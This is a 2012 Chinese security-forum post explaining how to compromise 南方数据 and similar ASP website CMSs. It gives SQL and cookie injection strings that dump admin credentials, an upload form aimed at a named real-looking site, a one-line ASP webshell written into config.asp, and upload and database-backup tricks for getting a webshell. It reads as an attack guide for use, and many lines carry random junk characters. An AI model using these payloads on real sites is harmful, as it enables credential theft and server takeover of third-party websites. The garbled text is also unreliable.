找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2380|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb4 [6 {7 _; R! o, b$ Y
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 ( t, h. H5 K% K) f3 k
也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
! Q. E" \3 ]% ^2 s" D( g直接暴管理员帐号密码(md5)
3 T2 r: A" @' ^! k" [2.登陆后台4 G9 P: P, ]' e% C
3.利用编辑器上传:7 m% }4 h" i3 Q- W% j6 L
访问admin/southidceditor/admin_style.asp
8 s7 T9 V# q5 E/ P3 H6 C修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.% f6 i2 K( y6 I1 K5 m2 j
; g6 W+ G, P6 n6 R+ p8 q
========================================+ b# I& N# b" n( U9 t/ G

3 K9 c/ ]% m# p4 e6 B参考资料整理:
  @) `7 J# z! F7 c$ ~$ X南方数据、良精系统、网软天下漏洞利用
. o: e' X9 y- S% W+ H5 V+ o9 b4 A& o. w6 d
1、通过upfile_other.asp漏洞文件直接取SHELL  }  F* r3 {6 V5 f9 s5 m+ h
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:: ]) ~+ D- H" @: k( f' |5 _" I3 c1 s
<HTML><HEAD> 5 g9 v6 N$ g5 p& F" J9 Z6 e
<META http-equiv=Content-Type content="text/html; charset=gb2312">   ^; \- V0 b. V' K0 V
<STYLE type=text/css>BODY { ) q$ G* M9 ?' U4 h% ^7 f
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee : ]2 {' O3 b5 m( q6 u
} 9 v. h& Y' c1 {5 |
.tx1 {
1 c  ~4 S0 E4 ]: pBORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
8 l$ \) a2 p" D: U7 O$ K}
6 S. v0 F. S* |3 M& o</STYLE>
' K1 }  r9 k- `! A3 B! M2 g<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
% Q) U* \5 e8 q<BODY leftMargin=0 topMargin=0>
: y4 x: I# L& V4 @2 y( O- w8 n" S<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post
! c8 I7 Z. D2 N# `9 u) X- j% ?encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit> " k0 f* n2 K' O' c( ^" ^/ V8 M
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>5 E0 H2 d5 t6 o! \

; H9 J" M$ f6 |5 n& F% _将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。9 A- b  {6 x1 {" ~7 a5 f" Z
注:此方法通杀南方数据、良精系统、网软天下等
# S; Q6 ?) Z5 t: c7 J4 Q6 \. G5 W% [, y: _2 m! n  w
2、通过注入秒杀管理员帐号密码,使用如下:
) G! n8 h! J3 m0 [* Hhttp://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’2 I) E) @$ j5 S; P7 }8 u
以上代码直接暴管理员帐号和密码,取SHELL方法如下:1 A8 f4 U) Y1 G- ~9 ?' j
在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’/ k3 l7 T% h1 Z) r" q; d
成功把shell写入http://www.target.com/inc/config.asp
. w! B" B/ i$ T7 d3 {这里一句话chr(32)密码是“#”( Z4 @0 T& Z( V( N, K" i: n
3、cookie注入' F. d- R0 s6 a7 c" ~' E9 x
清空地址栏,利用union语句来注入,提交:, ~$ y# |* C7 Q" z# }- W9 H/ g
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
" @3 E8 C" I6 J4 \; k如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?1 H% V  W9 x) I# a2 `0 W2 S
注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。
( s' z9 B, W1 D: \4 w% G4 \: e8 Q(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)
' s* J" J, x$ _7 d# M+ c, B+ ^; U/ p
三、后台取SHELL方法总结( e9 C1 l8 c& i9 g' z
(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:- b9 }! |4 n4 V5 Q
然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,
7 J1 {9 O8 ?) T+ Q8 D0 t# ^9 E这时再打开一句话马的客户端,提交同样得到一个小马3 j4 u7 w) n3 z: q
(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)) w! v/ l. w  ?
(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:
3 |# D8 j5 s+ O- T& K8 u: Uif fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then& V8 V  ?# O" y5 q
EnableUpload=false7 k8 h% C# @! T' ]( Y) [3 S* E

( j, B, Y7 g. q& w/ Wend if . d( i" \. ^' e4 }$ p4 t
if EnableUpload=false then# |$ `+ v# A& f6 L0 q
msg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType
" r, ]5 {% f. oFoundErr=true3 G: d/ V  j0 e% h5 l
end if
0 O0 I0 k4 B) ]- D+ Q3 }8 p大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:* N, H+ R: E! n* N! A6 I* E! k8 O
提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)
* R: P: K  m2 F! ^  O(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的. C( F( Z! Q7 {- g
2 }- _) Z; m' n* t6 Z5 C3 g2 i  Y
点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的" d! K4 q% U: s. |# a
直接访问备份后的地址,就得到一个webshell% G% E9 Q& y3 S: ?9 `" @3 |# M$ S5 j
(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表